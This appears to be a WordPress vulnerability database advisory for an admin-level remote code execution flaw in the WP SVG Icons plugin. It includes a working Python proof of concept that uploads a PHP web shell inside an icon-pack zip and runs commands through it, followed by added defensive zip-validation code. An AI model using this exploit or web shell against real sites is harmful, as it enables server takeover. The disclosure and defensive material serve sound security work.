WordPress Plugin Vulnerabilities
WP SVG Icons <= 3.2.3 - Admin+ Remote Code Execution (RCE)
Description
The plugin does not properly validate uploaded custom icon packs, allowing a high-privileged user such as an admin to upload a zip file containing malicious PHP code, leading to remote code execution.
Proof of Concept
import requests
import zipfile

BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"


def login(id, pw):
    # Phase : Login (because, we need a nonce value)
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data={
            'log': id,
            'pwd': pw,
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text
    return sess


def exploit(sess):
    res = sess.get(BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set").text
    res = res[res.find('''wp_svg_icons_upload_validation" value=''') + 39:]
    _nonce = res[:res.find('"')]

    with open("shellcode.php", "wb") as f:
        f.write(b"<?php echo(passthru($_REQUEST['qerogram'])); ?>")
    with open("selection.json", "w") as f:
        f.write("{}")

    with zipfile.ZipFile("output.zip", "w") as ZIP:
        ZIP.write("shellcode.php", compress_type=zipfile.ZIP_DEFLATED)
        ZIP.write("selection.json", compress_type=zipfile.ZIP_DEFLATED)

    with open("output.zip", "rb") as pack:
        sess.post(
            BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
            data={
                "wp_http_referer": "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
                "wp_svg_icons_upload_validation": _nonce
            },
            files={"custom_icon_pack": ("qerogram.zip", pack)}
        )

    while True:
        prompt = input("$ ")
        if prompt.lower() == "exit" or prompt.lower() == "quit":
            break
        res = sess.post(
            BASE_URL + "/wp-content/uploads/wp-svg-icons/custom-pack/shellcode.php",
            data={"qerogram": prompt}
        )
        print(res.text)


sess = login(id, pw)
exploit(sess)
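The root cause described above is that the archive's members are never checked before they are written under wp-content/uploads. The following is an added example of the kind of validation that closes this class of bug; it is not code from the plugin or from the researcher. It assumes a constructed policy (only .svg members plus a selection.json manifest, a member count and size cap, no path traversal) and uses hypothetical function names (validate_icon_pack, _safe_member_name, _build_zip). The problems list it returns is also a useful log/detection signal, since a rejected upload containing a .php member is itself worth alerting on.

```python
import io
import json
import os
import posixpath
import xml.etree.ElementTree as ET
import zipfile

# Constructed policy for this example: an icon pack may hold only SVG files
# plus the selection.json manifest; everything else is refused up front.
ALLOWED_EXTENSIONS = {".svg"}
MANIFEST_NAME = "selection.json"
MAX_ENTRIES = 2000
MAX_UNCOMPRESSED_BYTES = 20 * 1024 * 1024


def _safe_member_name(name):
    """Reject empty names, backslashes, absolute paths and '..' traversal."""
    if not name or "\\" in name or name.startswith("/"):
        return False
    norm = posixpath.normpath(name)
    return not (norm == ".." or norm.startswith("../") or norm.startswith("/"))


def validate_icon_pack(zip_bytes):
    """Return (ok, problems) for an uploaded icon pack held in memory.

    Nothing is extracted; every member is inspected from the in-memory archive
    and the caller only writes files to disk when ok is True.
    """
    problems = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return False, ["not a valid zip archive"]

    infos = archive.infolist()
    if len(infos) > MAX_ENTRIES:
        return False, ["too many entries"]
    if sum(i.file_size for i in infos) > MAX_UNCOMPRESSED_BYTES:
        return False, ["uncompressed size exceeds limit"]

    saw_manifest = False
    for info in infos:
        name = info.filename
        if not _safe_member_name(name.rstrip("/")):
            problems.append(f"unsafe path: {name!r}")
            continue
        if info.is_dir():
            continue
        base = posixpath.basename(name)
        ext = os.path.splitext(base)[1].lower()
        data = archive.read(info)
        if base == MANIFEST_NAME:
            saw_manifest = True
            try:
                json.loads(data.decode("utf-8"))
            except (UnicodeDecodeError, ValueError):
                problems.append(f"manifest is not valid JSON: {name!r}")
            continue
        if ext not in ALLOWED_EXTENSIONS:
            # This is the check the vulnerable version lacked: a .php member
            # (or any other non-SVG file) never reaches the uploads directory.
            problems.append(f"disallowed file type: {name!r}")
            continue
        lowered = data.lower()
        if b"<?php" in lowered or b"<script" in lowered:
            problems.append(f"active content inside SVG: {name!r}")
            continue
        try:
            root = ET.fromstring(data)
        except ET.ParseError:
            problems.append(f"SVG does not parse as XML: {name!r}")
            continue
        if not root.tag.endswith("svg"):
            problems.append(f"root element is not <svg>: {name!r}")
    if not saw_manifest:
        problems.append("missing selection.json manifest")
    return (not problems), problems


def _build_zip(members):
    """Constructed helper: build an in-memory zip from a {name: bytes} dict."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample archives: a clean pack, one carrying a PHP member like the
# PoC's, and one whose member name tries to escape the extraction directory.
GOOD_PACK = _build_zip({
    "selection.json": b"{}",
    "icons/home.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><path d="M0 0h8"/></svg>',
})
PHP_PACK = _build_zip({"selection.json": b"{}", "shellcode.php": b"<?php echo 'x'; ?>"})
TRAVERSAL_PACK = _build_zip({
    "selection.json": b"{}",
    "../../escaped.svg": b'<svg xmlns="http://www.w3.org/2000/svg"/>',
})

if __name__ == "__main__":
    for label, pack in (("good", GOOD_PACK), ("php", PHP_PACK), ("traversal", TRAVERSAL_PACK)):
        print(label, validate_icon_pack(pack))
```

The archive is inspected fully before any extraction, so a rejected pack leaves nothing on disk; pairing the allowlist with a web-server rule that refuses to execute PHP under wp-content/uploads gives a second, independent layer should a validation bug slip through.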
Affects Plugins
References
CVE
Classification
Type: RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher: qerogram
Submitter: qerogram
Submitter website
Verified: Yes
WPVDB ID
Timeline
Publicly Published: 2022-05-18
Added: 2022-05-18
Last Updated: 2023-02-07